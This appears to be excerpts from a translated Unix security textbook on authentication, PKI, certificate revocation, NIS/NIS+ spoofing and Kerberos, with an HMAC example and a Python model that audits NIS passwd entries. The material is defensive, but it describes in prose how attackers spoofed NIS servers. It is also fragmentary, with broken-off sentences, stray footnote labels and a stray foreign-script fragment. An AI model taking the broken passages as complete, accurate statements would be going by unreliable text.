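    f1 = sender.protect(b"close valve 7")
    altered = bytes([f1[0] ^ 0x01]) + f1[1:]  # one bit of the message changed in transit
    stranger = Receiver(b"not the shared key".ljust(32, b"\0"))
    return [
        receiver.accept(f0),       # accepted
        receiver.accept(f0),       # same frame again: tag no longer matches seq 1
        receiver.accept(altered),  # message changed: tag mismatch
        receiver.accept(f1),       # accepted, counter was not disturbed by rejects
        stranger.accept(f0),       # receiver without the shared key cannot verify
    ]


if __name__ == "__main__":
    for result in run_exchange():
        print(result)
```

With an implicit counter, a frame lost in transit leaves the two sides out of step, so a protocol built this way also needs a resynchronization rule.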
HMACs are usually used to harden network protocol messages against tampering, because they are much faster to compute than digital signatures and are also smaller. However, HMACs are based on a shared key that must be protected from compromise, whereas digital signatures usually work with public key systems. Several general-purpose cryptographic protocols have been built for securing network connections. These protocols are usually built from a combination of cryptographic algorithms in order to support key exchange, authentication, encryption, and message integrity verification, together with a specification of how a client and a server will agree on algorithms, exchanged credentials, and session keys. For example, the SSL/TLS protocol supports these combinations of algorithms:
Chapter Five
Identification and Authentication
Overview
Identification associates an identity with a subject. Authentication establishes the validity of an identity, and authorization associates rights or privileges with an identity. This chapter concentrates on the first two of these concepts. Identification and authentication may be carried out solely by the workstation that a person is using, or authentication may be handled by a network-based system in which users' identities are stored on a central server and shared by groups of clients.
Identification techniques
Computers employ a variety of identification systems. The simplest work on the basis of usernames and passwords; others are based on special hardware that can measure the distinguishing characteristics of different people. There are also systems that work on the basis of public key cryptography.
None of the identification techniques is such that it can never be fooled and bypassed; fortunately, most of them do not need to be. The goal of most identification systems is not to make identity forgery impossible, but to reduce the risk of identity forgery and the resulting losses to an acceptable level. Another important goal of identification systems is to quantify the amount of risk that still remains after the system has been deployed, because quantifying the residual risk allows an organization to make decisions about policies, about the need or desire for alternative identification systems, and even about the amount of insurance coverage needed to protect against the possibility of fraud.
Physical identification
Fly to an international airport and swipe your credit card through the card reader of a car rental agency, and you can drive to your destination in a car that may be worth more than twenty thousand dollars. The only assurance the rental agency has that you will return its car is your promise, together with the knowledge that if you break that promise, the agency can cancel your credit card and you will probably go to jail.
If the rental agency did not know who you were, your promise would mean nothing to it. It is your driver's license, passport, or credit card that, together with a worldwide computer network, allows the rental agency to find out within a few seconds whether your credit card is stolen, and to inform your employer and its insurance company of the trust it has placed in you.
Printed identification documents are designed around the ability to validate them physically. A passport is a good identification document because it contains information that can be checked physically (sex, height, weight, photograph, signature), it is difficult to forge, it cannot easily be misused, and it is issued by a reputable, trusted, and well-known authority that checks a person's identity before issuing the document. By contrast, a membership card for a press club has none of these qualities.
• Good passwords are easily forgotten, which leads people to write them down, use the same password for many applications, choose simpler passwords, or use poor passwords that are easy to guess.
• Passwords can be shared, which may allow unauthorized people to use resources that they should not.
… because it is based on measuring something about a living person. Biometrics can take many forms, such as images of the face, the retina, the iris, fingerprints, hand geometry, voiceprint, handwriting, typing characteristics, or DNA patterns.
Biometric techniques can be used both for "ongoing identification" and for "absolute identification". Using these techniques for ongoing identification is simpler: the first time a user logs in to the system, his or her biometric information is recorded. On subsequent logins, the new biometric is compared with what was recorded earlier. Using biometrics for absolute identification requires building a large database that maps names to biometrics. In the United States, the Federal Bureau of Investigation (FBI) has such databases: one matches names to fingerprints and another matches names to DNA elements.
Compared with passwords and access tokens, biometrics have two clear advantages: they cannot be forgotten or lost, and they cannot easily be shared, copied, or stolen. But moving biometric technology from the laboratory to the marketplace is difficult. Every biometric system has a certain level of false positives, in which the system declares a match that it should not declare. Similarly, there are false negatives, in which the system declares that two biometrics come from different people when they are in fact from the same person. To reduce the possibility of false matches, some biometric systems combine the biometric with a password or a token. In the case of passwords, the user is usually asked to type a secret identification code such as a PIN and then to provide a biometric sample, such as a voiceprint. The system uses the identification code to retrieve a stored profile, and then compares the biometric with the stored template. In this way the system has to compare the presented biometric with only one of the stored values, rather than with the entire database.
Biometrics are not exact, because:
• Before a person can be identified, his or her biometric characteristics must already be in the computer's database;
• If the database of biometric characteristics is compromised, biometric identification becomes worthless; and
• Unless the measuring equipment is specially protected, it is vulnerable to fraud and tampering. For example, a clever thief faced with a voice-based identification system might be able to fool it by recording the voice of the authorized person (as that person speaks his or her password), rewinding the tape, and then playing back the recorded voice.
A simple form of location-based authentication is to have a particular computer or terminal that is authorized to perform a particular operation. People who are in other locations are denied such privileges. To date, "location" has not been used as a general-purpose authentication system.
130 Realtime
131 Challenge Data
2. The private key must be stored securely. Otherwise it may be misused, stolen, or used fraudulently by others.
3. An assurance mechanism is needed, so that the person evaluating the identity can trust that the name on the key is in fact the correct name of the key's current owner.
If keys are generated carelessly, an attacker may be able to compute the private key from the corresponding public key. If keys are not stored properly, an attacker may be able to steal the private key easily.
Although these rules look simple at first glance, implementing them correctly is very difficult. Worse still, it is usually very hard to evaluate a company's public key system and determine whether or not it is more secure than another system.
There are several different ways to generate and store keys. In roughly decreasing order of security, they are as follows:
1. Use a cryptographic coprocessor such as a smart card. A smart card that supports public key cryptography has a microprocessor, a hardware random number generator, and functions for the basic public key algorithms, as well as memory that can hold keys and public key certificates. In theory, the private key never leaves the card. If you want to sign or decrypt a piece of information, that piece of information has to be transferred to the card, and the signed or decrypted answer is then transferred off the card. Attackers therefore cannot use the private key unless they obtain possession of the smart card themselves. Passwords, identification codes, fingerprint readers, or other biometric devices can be added to smart cards so that the card creates a signature only if the cardholder has been authenticated by the card.
On the other hand, smart cards are not without flaws, and in some respects they are quite fragile. If the card is lost, stolen, or damaged, the keys on it are gone and are no longer available to the user. So if the keys on the cards are going to be used to encrypt information over a long period, we may want some kind of system for copying the key off the card, to prevent the key from becoming unusable. If these keys are used only for digital signatures, however, none of this is necessary: if a signing key is lost, it is enough to create a new signing key, and no information is lost in the process. Smart cards are also not completely secure against tampering. Cryptographic smart cards run small operating systems, and flaws in these operating systems can lead to compromise of the key. It is also possible to analyze a card physically and recover the keys on it. Even so, smart cards are currently the most secure way to store private keys.
2. Generate the keys on a desktop computer and then store the encrypted keys on a floppy disk or flash drive. When the key is needed, the user inserts the floppy disk into the computer's drive; the computer reads the encrypted private key into memory, decrypts the key, and finally uses the key to sign the requested information. This technique is less secure than a smart card, because the private key has to be transferred into the computer's memory, where it may be attacked by computer viruses, Trojan horses, or other malicious programs.
3. Generate the key inside the computer, then encrypt it using a passphrase and store it in a file on the computer's hard disk. This is the technique that programs such as PGP and Netscape Navigator use to protect private keys. Although it is a convenient technique, its drawback is that anyone who gains access to your computer and knows your passphrase can get hold of your private key. And because the key has to be decrypted by the computer in order to be used, it is vulnerable to attacks on the computer's memory by malicious programs or Trojan horses.
4. The least secure way to generate a private key/public key pair is to ask someone else to do it for you and then collect your public and private keys from that person. The fundamental problem with this approach is that the private key is, by definition, compromised, because someone else has a copy of it. Despite this, some organizations (and some governments) require people to use keys generated by a third party, so that the organization has a copy of every user's key and can decrypt all e-mail sent to individuals.
In practice, most cryptographic systems use the third option: generating a key on a desktop computer and then storing it on the computer's hard disk.
Digital certificates
The use of digital certificates and a public key infrastructure (PKI) are attempts to tie identities to digital signatures. A digital certificate is a special kind of digital signature: it is a digital signature that comes with an identity and is designed so that it can be interpreted automatically by computers. A PKI is a collection of technologies and policies for creating and using digital certificates. The effectiveness of these systems depends on three things being tied together at once: carefully written public key cryptography, policies that are rigorously enforced and maintained, and a legal system that guarantees that the policies are carried out correctly. PKI is discussed in detail later in this chapter.
Identifying someone digitally by means of a public key is a deep philosophical problem. How can you be sure that a public key belongs to the person or organization whose name is on the key? How can one gain assurance about something uncertain? Because defined rules and processes are followed in creating and protecting these instructions, in practice we can know something about the identity of key holders and the validity of digital certificates.
There are three main ways to ensure that a public key really belongs to the person who claims to own it:
1. Obtain the public key directly from the person and verify it in a way that leaves you completely sure of it.
2. Make sure that another person whom you trust has verified the key.
3. Make sure that a reputable, trusted authority has certified the key.
Digests are usually called "key fingerprints". Some users of public key cryptography print their key fingerprints on their business cards, so if you received the business card directly from Jane, you can later download Jane's public key and check that it is correct.
the public key of the certification authority, and also a serial number. To date, most certificates issued by certification authorities (CAs) are certificates that vouch that a particular public key belongs to a particular person or organization. Certificates can also be used as proof, similar to the university example mentioned earlier. The services of a certification authority can be used in several ways:
Companies can also use an internal certification authority that issues certificates to customers. For example, several stock exchanges required their customers to obtain the necessary certificates before being allowed to carry out high-value trades over the Internet.
ﺷﻮﻧﺪ.
Clearly, those certification authorities whose keys were not pre-installed in web browsers or operating systems have been at a disadvantage. Although Microsoft and Netscape now open their browsers to any certification authority that can meet their certification requirements, the major web browsers were distributed with a limited number of carefully selected CA keys. Having these keys placed in those programs was a great advantage for the certification authorities that published them and a barrier for everyone else.
The Certification Practice Statement (CPS) [137] is a legal document published by the certification authority that describes its policies and procedures for issuing and revoking digital certificates. A certification authority's CPS makes clear what it means for a key to be certified by that authority.
CPS documents are designed to be read by people, not machines. A business may want to accept the certificates of a certification authority that guarantees minimum certification policies and assumes a defined level of liability if the certificate policies are not followed, and it may want the certification authority to be backed by a reputable organization.
Although certification authorities can issue any kind of certificate, in practice most of them issue certificates that follow the X.509 v3 standard. Likewise, most cryptographic programs and protocols, including SSL, are designed to use only X.509 v3 certificates. The one important exception is PGP, which uses its own certificate format, although recent versions also support some X.509 certificates. (The SSH program does not use certificates; it relies instead on users verifying keys personally.)
Every X.509 certificate contains a version number, a serial number, identity information, algorithm-related information, and the signature of the issuing authority. The industry adopted X.509 v3 certificates rather than the original X.509 certificates because the X.509 v3 standard allowed arbitrary "name" and "value" items to be included in the standard certificate. These can be used for many purposes and allow the use of certificates to be extended without changing the underlying protocol.
Types of Certificates
Four kinds of digital certificate are in use on the Internet today:
Server certificates
These certificates contain the public key of an SSL server, the name of the organization that runs the server, and the server's DNS name. Every information server on the Internet that offers encryption must have a server certificate for the SSL encryption protocol in order to work properly. Although the original purpose of issuing these certificates was to help clients establish the identity of web servers and to prevent man-in-the-middle attacks [138], in practice server certificates are used more for encryption than for authenticating the server.
Personal certificates
These certificates contain a person's name and public key. They can also include other information such as the person's e-mail address, postal address, and date of birth. They are issued by organizations for their employees or customers. Personal certificates are inherently a more secure way for people to identify themselves on the Internet than a password and username. They are also required for users of the S/MIME e-mail encryption protocol.
Revocation
Besides issuing certificates, a certification authority must be able to revoke a certificate if it learns that it made a mistake or that the private key has been misused. A subscriber's certificate must also be revoked when that subscriber's validity period comes to an end.
The need for a practical revocation mechanism became entirely clear in March 2001, when Microsoft announced that in January VeriSign had issued two certificates to a person who falsely claimed to be a Microsoft employee; the employer name recorded in both certificates was Microsoft Corporation. Microsoft noted that "the ability to sign executable files using keys that purport to belong to Microsoft could be of great benefit to attackers who want to induce users to accept running those files." [142]
138 Man-in-the-Middle
139 Minimal Disclosure Certificates
140 Stefan Brands
141 http://www.wired.com/news/technology/0,1282,34496,00.html
• If the certification authority is very popular, its CRLs are likely to be very large. Downloading a CRL of, say, 900 kilobytes over a dial-up connection to the SSL server of the VeriSign certification authority may take more than 20 minutes;
• Between the time a certificate is revoked and the time the new CRL is distributed there is a window during which the certificate appears valid when it is not; and
• Many programs do not implement CRLs and CDPs correctly.
In the case of the fraudulent Microsoft certificates mentioned earlier, the bad certificates were revoked and appeared in VeriSign's CRL, but unfortunately the certificates VeriSign had issued did not contain valid CDPs. (According to VeriSign, because of a bug in the Authenticode implementation distributed with Internet Explorer 3.02, Authenticode certificates do not contain CDPs.) Without a CDP, a program trying to validate the fraudulently issued certificate did not know where to fetch the CRL in which the revoked certificates were listed. [145]
An alternative to CRLs is real-time certificate validation. Whenever a certificate has to be validated, the certification authority is consulted online. Real-time validation systems solve the CRL problem neatly, although they require a reliable and trustworthy network.
142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
143 Certificate Revocation Lists
144 CRL Distribution Point
145 In the end Microsoft had to issue an operating system patch to resolve the problem. The fix contained an additional CDP that made Internet Explorer consult a local CRL to validate certificates, together with a CRL listing the two certificates that VeriSign had issued by mistake.
The first problem with real-time certificate validation systems is one of "scale". As certificates gain more and more users, the validation servers have to become faster and faster to serve the growing user community. Real-time systems are also vulnerable to denial-of-service attacks. If a business cannot reach the revocation server, how should it treat a certificate? Should it trust it or give it no credit? If the default is to trust, an attacker can flood the revocation server with a very large number of bogus requests so that it is out of action at the moment an invalid certificate is used. If the default is to distrust, an attacker can use denial-of-service attacks to make the revocation server unreachable so that every transaction is rejected, and the company's reputation is quickly damaged.
It is very important for a certification authority to keep supporting every URL that appears in any certificate it has issued. If a certification authority changes its CPS, each CPS should be available from its own unique URL. These links must remain reachable for the whole validity period of every certificate that refers to that CPS, because the legal meaning of a certificate cannot be determined without reading the CPS. Moreover, because the meaning of a signature may be questioned years after it was made, as a rule the URLs should stay active for at least 20 years.
Unfortunately, many certification authority certificates refer to CPSs that can no longer be reached. For example, the self-signed certificate of Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C., which is distributed with Internet Explorer 5.0, is valid from June 1999 to June 2009. The certificate claims that its CPS is available at http://www.correduriapublica.org.mx/RCD/dpc, yet that URL was not reachable, at least in April 2001.
The need for a widespread public key infrastructure is unavoidable. The number of fraud incidents on the Internet is rising and the need to use digital signatures for commerce is growing. Even so, a widespread PKI seems further away today than it did in the mid-1990s. That private keys and digital certificates should be used to prove identity is a thoroughly established idea among computer security specialists, yet when the digital signature at the end of an e-mail message fails to verify, these same specialists phone each other to make sure, and the only reason is that the technology, for all its simplicity, runs into unwanted and unpredictable problems.
The next page points out a few of the problems that have to be dealt with in building a real PKI.
have downloaded, and run it without knowing enough about where it came from. Some of these computers are infected with viruses, some of the downloaded programs contain pre-installed Trojans, and the common operating systems and browsers have serious flaws, with hundreds of security patches issued for them over the years. It is therefore possible that a network-connected system has been misused by unknown parties in the recent past. Widespread use of card readers and smart cards may make it harder to steal people's private keys, but it does not make it impossible.
do not know, so for you there are still a great many Robert Smiths. Of course, if these digital certificates had fields for age, sex, or a photograph, Internet users would say that disclosing these identifiers without the user's consent violates their privacy, and they might well be right. Preventing this is the main strength of an identity card: removing anonymity while still preserving privacy, and so establishing identity and accountability.
147 Statement on Auditing Standards No. 70 (SAS 70), for service organizations, is an international standard created by the American Institute of Certified Public Accountants (AICPA). A SAS 70 evaluation confirms that a service organization has had its control objectives and control activities evaluated and confirmed by an independent auditing firm.
148 Service Auditor Report
149 Under WebTrust certification for networks, a qualified, independent auditor uses a set of accepted principles to determine whether an operating certification authority meets the minimum conditions for disclosure, policy, practices, and control procedures.
150 Attestation Report
151 American Bar Association Information Security Committee
152 PKI Assessment Guidelines
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+::999:999:::
This entry causes the program that reads the /etc/passwd file on the client to issue a network request to read the passwd map. The passwd map is usually built from the /etc/passwd file on the server, although that is not always the case. When NIS scans the /etc/passwd file, it stops at the first line that matches. You can restrict the import of accounts to particular users by adding a username after the "+" sign. You can also exclude particular usernames from being imported by inserting a line that begins with a minus sign (-).
NIS also lets you selectively import some fields from the /etc/passwd database. For example, if you have the following entry in your /etc/passwd file:
root:si4NOjF9Q8JpE:0:1:Mr. Root:/:/bin/sh
+:*:999:999:::
then all of the entries in the NIS passwd map will be imported, but each will have its password field replaced with "*", which prevents it from being used on the client machine. All of the UIDs and account names are still picked up, so that file listings show the owners of files and directories as usernames. The entry also lets ~user in the various shells map correctly to the user's home directory (assuming that directory is mounted using NFS).
NIS Domains
When you configure an NIS server you must specify an NIS domain [156]. These domains are not the same as DNS domains. DNS domains identify a region of the Internet, whereas NIS domains identify an administrative group of computers. The Unix domainname command is used to display and change the name of a domain. A computer can be in only one NIS domain at any time, but it can serve any number of NIS domains.
Do not use your Internet domain as your "netgroup" domain. Setting the two domains to the same name has caused problems with some versions of sendmail. Using an NIS domain that is easy to guess also creates security risks. Intruder tools that try to exploit weaknesses in NIS and NFS almost always try variations of the Internet domain name as the NIS domain name before trying anything else. (The NIS domain name can, of course, still be determined in other ways.)
With NIS netgroups [157] you can create groups of users or machines on the network. Netgroups are similar in principle to local user groups, but far more complicated.
The primary purpose of netgroups is to simplify configuration files and reduce the chance of error. By defining netgroups and using them properly, you can raise the security of the system by limiting the people and machines that have access to critical resources.
The netgroup database is kept on the NIS master server in the file /usr/etc/netgroup or /etc/netgroup. This file consists of one or more lines in the following format:
/etc/yp/domainname/netgroup.dir
/etc/yp/domainname/netgroup.pag
/etc/yp/domainname/netgroup.byuser.dir
/etc/yp/domainname/netgroup.byuser.pag
/etc/yp/domainname/netgroup.byhost.dir
/etc/yp/domainname/netgroup.byhost.pag
Note that on some machines /etc/yp may be a symbolic link to /var/yp.
If you have a small organization you can create just two netgroups: one for all users and another for all client machines. These groups make it easier to create and administer your system configuration files.
If you have a larger organization you can create several groups. For example, you can create one group for the users of each department. You can then have a master group that contains all of the other subgroups. You can, of course, do the same for computers.
Consider a science department with a structure like the following:
+@operators::999:999:::
The entry above imports the password entries of the users listed in the operators group from the NIS map. You can also exclude users or groups of users with the minus sign (-), provided that you list the exclusions before the netgroups.
The +@netgroup and -@netgroup notations do not work on all versions of NIS, and so far they have not worked reliably on the remaining versions either. If you intend to use these features, test your system to make sure they behave as they should. Remember that simply reading the documentation is not enough for this purpose.
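The first-match handling of "+" and "-" lines in /etc/passwd and the +@netgroup ordering rule described above, modelled as an added example (it is not code from the handbook or from any NIS implementation). The NIS map, the netgroups and every account name other than root are constructed, and letting only the password, gecos, home and shell fields of a "+" line override the map is an assumption, since implementations differ.

```python
# Fields of a "+" line that override the imported entry in this model
# (assumption): password, gecos, home, shell. UID/GID stay as in the map.
OVERRIDABLE = (1, 4, 5, 6)


def parse(text):
    """Return (line number, colon-split fields) for every non-blank line."""
    return [(n, line.strip().split(":"))
            for n, line in enumerate(text.splitlines(), 1) if line.strip()]


def selector_matches(selector, user, netgroups):
    """selector is what follows +/-: '' (everyone), 'name' or '@netgroup'."""
    if selector == "":
        return True
    if selector.startswith("@"):
        return user in netgroups.get(selector[1:], set())
    return selector == user


def resolve(text, user, nis_map, netgroups):
    """Fields a lookup of `user` ends up with (first match wins), else None."""
    for _, fields in parse(text):
        name = fields[0]
        if not name or name[0] not in "+-":
            if name == user:
                return fields            # ordinary local account
            continue
        if not selector_matches(name[1:], user, netgroups):
            continue
        if name[0] == "-":
            return None                  # excluded before any import matched
        if user not in nis_map:
            continue
        merged = list(nis_map[user])
        for i in OVERRIDABLE:
            if i < len(fields) and fields[i]:
                merged[i] = fields[i]    # e.g. "*" replaces the imported hash
        return merged
    return None


def audit(text):
    """Return (line number, finding) pairs for entries worth a manual check."""
    findings = []
    import_all_seen = False
    for lineno, fields in parse(text):
        name = fields[0]
        if not name or name[0] not in "+-":
            if len(fields) != 7:
                findings.append((lineno, "malformed-local-entry"))
        elif name == "+":
            import_all_seen = True
            # Candidate for the "log in as +" test: no "*" guards this line.
            if len(fields) < 2 or fields[1] == "":
                findings.append((lineno, "plus-entry-empty-password"))
        elif name[0] == "-" and import_all_seen:
            # The earlier "+" line already matched this account.
            findings.append((lineno, "exclusion-after-import-all"))
    return findings


# Constructed sample data; only the root and "+" line shapes follow the text.
NIS_MAP = {
    "alice": ["alice", "HASHalice", "1001", "100", "Alice", "/home/alice", "/bin/sh"],
    "bob": ["bob", "HASHbob", "1002", "100", "Bob", "/home/bob", "/bin/sh"],
    "carol": ["carol", "HASHcarol", "1003", "100", "Carol", "/home/carol", "/bin/sh"],
    "guest": ["guest", "HASHguest", "1004", "100", "Guest", "/home/guest", "/bin/sh"],
}
NETGROUPS = {"operators": {"alice", "carol"}, "contractors": {"carol"}}
SAMPLE = """\
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
-@contractors::::::
+@operators::999:999:::
+:*:999:999:::
-guest::::::
"""

if __name__ == "__main__":
    for who in ("root", "alice", "bob", "carol", "guest"):
        print(who, resolve(SAMPLE, who, NIS_MAP, NETGROUPS))
    print(audit(SAMPLE))
```

In the sample, carol is shut out because her exclusion comes first, while the late `-guest` line never takes effect because the `+:*:` line above it has already matched.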
Limitations of NIS
Use of NIS has been the starting point of many successful break-ins on Unix networks. Because NIS controls user accounts, if you can convince an NIS server to announce to the whole network that you have an account, you can use that account to break into a client on that network. NIS can also make confidential information, such as encrypted passwords, publicly available.
The NIS implementations of various vendors contain several design flaws that allow a user to reconfigure and spoof the NIS system. This spoofing can be done in two ways: by spoofing the remote procedure call system, and by spoofing NIS.
RPC spoofing
Remote procedure call (RPC) [159] lets networked systems call functions on other systems. NIS depends on the RPC portmapper service, a daemon that matches the names of services offered over RPC with the IP port numbers at which those services can be contacted. Servers that use RPC register themselves with portmapper when they start, and remove themselves from the portmapper database when they exit or are reconfigured.
In early versions of portmapper any program could register itself as an RPC server, which gave attackers the opportunity to register their own NIS servers and answer requests with their own password files. Most current versions of portmapper reject requests to register or delete services if they come from a remote machine, or if they refer to a privileged port but arrive over a connection initiated from an unprivileged port. As a result, only the superuser can request that service mappings to privileged ports be added or deleted, and all requests can only be made locally. However, not every vendor's version of the portmapper daemon performs these checks.
Note that NFS and some NIS services are usually registered on unprivileged ports. In theory, even with the checks listed above, an attacker can replace one of these services with a specially written program and so answer system requests in a way that compromises the security of the system.
NIS spoofing
NIS clients obtain information from an NIS server using RPC. A local daemon named ypbind keeps in memory the contact information for the corresponding NIS server daemon, named ypserv. ypserv may be running locally or remotely.
Under early SunOS versions of the NIS service (and possibly other vendors' versions), it was possible to instantiate a program that behaves like ypserv and answers ypbind requests. The local ypbind daemon could then be instructed to use that look-alike program instead of the real ypserv. An attacker could therefore configure the system so that, for example, his own version of the password file was used to answer login requests!
Current NIS implementations of ypbind have a -secure or -s command-line parameter that can be given when the daemon is started. If the parameter is used, the ypbind daemon will not accept any information from ypserv servers that are not running on privileged ports. So if a user tries to introduce a fake ypserv daemon, the attempt is ignored. There is usually no convincing reason not to use the -secure parameter.
Unfortunately, the -secure parameter has a flaw. If an attacker can compromise the root account on any other machine connected to the local network and run a copy of ypserv with his own NIS information, then to carry out the attack he only has to point the target's ypbind at that server. The compromised server may be running on a privileged port, so its responses will not be rejected. An attacker can also write a fake ypserv that runs on a PC-compatible system. Privileged ports have no special meaning in that case, so any user can run the server on any port and supply information to the target ypbind process.
change the encrypted password to ""," which naturally kept anyone from logging in. So having this entry was not correct either!
One of the simplest ways to deal with this confusion is to try logging in to your NIS clients and servers with the username "+". You can also unplug the network cable and then try to log in, to simulate what happens to the computer when the NIS server is unavailable. In either case you should not be able to log in simply by typing "+" as the username. This test will tell you whether the server is configured properly.
If you are running a recent version of your operating system, do not assume that your system is immune to the NIS subsystems' confusion over "+". In particular, some versions of NIS on Linux make this mistake too.
160 In Sun's implementation of NIS, and perhaps some other implementations, this danger can be reduced to some extent by preventing the UID and GID values of the NIS entries in the passwd file from being changed to zero, or to other values, by local users.
The NIS database contains sensitive information. There are several ways to prevent unauthorized disclosure of the information in the NIS database. As with most security improvements, you can combine several of these methods to obtain a multilayered defense in depth [161]:
1. Protect your site with a firewall, or at least a smart router, and do not allow RPC-related UDP packets to pass between your internal network and the outside world. Unfortunately, because RPC is built on the portmapper, the actual UDP port in use is not a fixed, known port. In practice, the only safe strategy is to block all UDP packets except those you specifically choose to allow.
2. Use a version of portmapper that can hold a list of computers (by hostname or IP address) whose access to particular RPC servers is to be allowed or denied. If you have no firewall, an attacker can still probe for each RPC service without going through the portmapper, but if RPC clients first try to contact the portmapper, an improved version of NIS can give warning of a potential attack.
3. Check whether your NIS uses the /var/yp/securenets file on NIS servers. If the file exists, it can specify a list of the networks that are able to receive NIS information. Other versions of NIS probably offer other ways for ypserv to filter the addresses that are allowed to reach a particular RPC server.
4. Do not use NIS so much that you forget about DNS! If your policy is that nobody outside should be able to learn your organization's IP addresses, run two name servers [162]: one for internal use and another for external use.
Sun's NIS+
NIS was designed for small, friendly computing environments. When customers of Sun Microsystems began building networks with thousands of workstations, it became clear that NIS was impractical and insecure for use by large companies. In 1990 Sun Microsystems began work on a replacement for NIS, and a few years later the system was released as NIS+.
NIS+ quickly gained a reputation for being broken, and it seemed that its early versions had practically never been tested, because they rarely worked as they were supposed to. On top of that, its documentation was very confusing and incomplete. Sun eventually fixed its defects, so that today NIS+ is a more reliable system for secure network management and control. An excellent reference for people who use NIS+ is the book All About Administering NIS+ [163] by Rick Ramsey [164].
Using NIS+
Using NIS+ can be very satisfying. When a user logs in to a workstation, the login program automatically retrieves the user's NIS+ security credentials and tries to decrypt them with the user's password.
If the password entered and the password stored in NIS+ are the same (which is usually the case), the NIS+ keyserv process keeps the user's private key in memory, and the user gains effectively direct access to all Secure RPC services (in other words, the intermediate authentication layer becomes invisible). If the password entered and the password stored in NIS+ are not the same, the user has to log in to the NIS+ domain manually with the keylogin command. NIS+ users change their passwords with the nispasswd command, which works much like the standard Unix passwd command.
NIS+ security is implemented by providing a means of authenticating users, and by creating access control lists that control the ways in which authenticated users can interact with the information stored in NIS+ tables. NIS+ offers two kinds of authentication: local authentication is based on the UID that executes an NIS+ command and is used widely for administering NIS+ master servers, and DES authentication is based on Secure RPC.
Every NIS+ object has an "owner", which is usually the principal that created it (the owner of an object can be changed with the nischown command). NIS+ objects also have access control lists, which are used to control which principal has what kind of access to the object: read, modify, create, delete, or merge. Four kinds of principal can have access to an object: nobody (unauthenticated requests), the owner of the object, principals that are in the same group as the object, and other authenticated principals.
NIS+ tables may grant additional access privileges to their individual rows, columns, or entries. Thus all authenticated users have read access to every part of a table, but each user can modify only the row of the table that relates to his own account. Note that because the permissions on individual rows, columns, and entries can only enlarge the access control list, more restrictive rules cannot be applied with them.
Limitations of NIS+
If NIS+ is configured properly it can be a very secure system for authentication and network management. However, as with all security systems, a mistake can be made in configuring or managing NIS+ that reduces the security of the network NIS+ is protecting. Some points to be aware of follow:
Manually check the permissions of NIS+ objects at regular intervals
There is as yet no integrity-checking software for NIS+, so NIS+ tables, directories, and groups have to be checked by hand at regular intervals. Watch carefully for objects that nobody or everybody is allowed to modify, and for tables in which these two classes of principal can create new objects.
Kerberos
In the late 1980s at the Massachusetts Institute of Technology (MIT) [171], hundreds of powerful workstations with large displays, fast (for the time) processors, small disks, and Ethernet interfaces replaced the older system, which had consisted of terminals and a few time-shared computers [172]. The goal was for users to be able to reach their files and the network from any of the computers.
As soon as the workstations went into service, the problem of network eavesdropping became painfully apparent. Because the network could be reached from everywhere, nothing stopped students (or attackers from outside the institute) from using network sniffing programs. It was almost impossible to keep students from learning the workstations' root password or from rebooting them in single-user mode. To make matters worse, many of the computers attached to the network were IBM PC/ATs running software that lacked even the rudiments of computer security. Something had to be done so that students' files on the network were protected at least as well as they had been on the previous time-sharing system.
MIT's eventual solution to this security problem was "Kerberos", an authentication system that used DES encryption to protect sensitive information, such as passwords, on open networks. When a user logs in to a workstation that is running Kerberos, the Kerberos server issues a "ticket" for that user. The user's ticket can be opened only with the user's password and contains the information needed to obtain other tickets. From this point on, whenever the user wants to access a network service, a ticket specific to that service must be presented. Because all of the information in Kerberos tickets is encrypted before it is sent over the network, the transmitted information cannot be eavesdropped on either.
There have been five major revisions in the history of Kerberos so far, and two versions of Kerberos are currently in use in the market.
Kerberos 4 is more efficient than Kerberos 5 but more limited. For example, Kerberos 4 can run only on TCP/IP networks, has not been upgraded for several years, and is now regarded as obsolete. In early 1996, graduates of the COAST Laboratory (which was merged into the CERIAS research center in 1998) at Purdue University discovered a deep weakness in the way Kerberos 4 keys were generated that allowed an attacker to guess session keys within a few seconds. Although a fix for this vulnerability was widely distributed, it has turned out that some Kerberos 4 implementations are also vulnerable to buffer overflow attacks, and no fix has been provided for them.
Kerberos 5 fixed the known problems of the Kerberos protocol and made it more resistant to common network attacks. Kerberos 5 is also more flexible and can work with other kinds of network. Kerberos 5 also has provisions for working with encryption algorithms other than DES. Although algorithms such as triple DES have been implemented, they are not widely used, mostly because of legacy programs that have used encryption.
Finally, Kerberos 5 also has several new features: delegation of authentication, tickets with expiry times of more than 21 hours, renewable tickets, tickets that become active at some time in the future, and many other options. If you want to use Kerberos, Kerberos 5 is the recommended choice. The IETF has worked on revising and clarifying RFC 1510, which defines Kerberos 5, and has proposed several anticipated extensions to the protocol.
Authentication in Kerberos is based entirely on knowledge of passwords that are stored on the Kerberos servers. Unlike Unix passwords, which are encrypted with a one-way algorithm, a Kerberos password is stored on the server encrypted with a conventional algorithm, in most cases DES, so the server can decrypt it when needed. The user, in turn, proves his identity to the Kerberos server by demonstrating knowledge of the key in use.
The fact that the Kerberos server has access to the user's decrypted password follows from the fact that Kerberos does not use public key cryptography. [173] This is a serious drawback of the Kerberos system. It means that the server must be both physically secure and "computationally secure". The server must be physically secure so that it cannot be stolen and all of the users' passwords disclosed. The server must also be secure against login attacks, because if an attacker can log in to the server and obtain "root" access, he can again steal all of the passwords.
Kerberos was designed so that its server could be stateless. The server simply answers users' requests and issues tickets when appropriate. This design makes it relatively easy to set up replicated, secondary servers that can answer authentication requests when the primary server is unavailable. Unfortunately, these secondary servers need complete copies of the entire Kerberos database, which means that they too must be both physically and computationally secure.
173 Public key cryptography is not used in Kerberos because, at the time Kerberos was created, public key cryptography was still protected by patent law. There is a draft proposal from the IETF, introduced as "Public Key Cryptography for Initial Authentication in Kerberos", that offers methods for integrating public key smart cards with Kerberos. This proposal has been implemented by Microsoft.
174 OpenSSH patches for using Kerberos 5 in authentication are available at the following address:
http://www.sxw.org.uk/computing/patches/openssh.html
Although SSH has also been used alongside Kerberos 4, it is very hard to make the two systems interoperate. Fortunately, version 2 of the SSH protocol can use the same security layer as Kerberos 5 (GSSAPI), which simplifies matters considerably. The IETF draft that covers the integration of these systems is draft-ietf-secsh-gsskeyex.
